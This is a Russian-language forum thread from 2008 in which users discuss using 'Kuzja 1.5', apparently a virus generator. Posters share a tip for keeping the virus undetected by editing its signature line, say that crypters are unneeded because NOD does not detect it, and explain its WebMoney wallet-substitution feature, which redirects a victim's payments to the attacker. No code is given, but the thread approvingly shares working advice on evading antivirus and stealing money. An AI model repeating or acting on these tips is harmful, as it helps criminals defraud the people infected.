Генератор нормальок.Но зачем к нему какие то крипторы у меня вобще старая версия нодом не палит.

можно просто первую строчку вируса с 'This virus created with Kuzja на любую другую и он будет все равно работать. ;)

GrandPa92
29.07.2008, 11:52
У меня вопрос по кузе 1.5 :
Что это за функция подмена Wm кошелька? и как она работает?

sasha008
29.07.2008, 12:00
GrandPa92 генератор подменивает кошыльки на твои и когда юзер будет давать комуто свой кошель штоб бабки перекинуть он даст твой!!

GrandPa92
29.07.2008, 12:38
понятно. А сам он будет думаьб что дает свой кошель?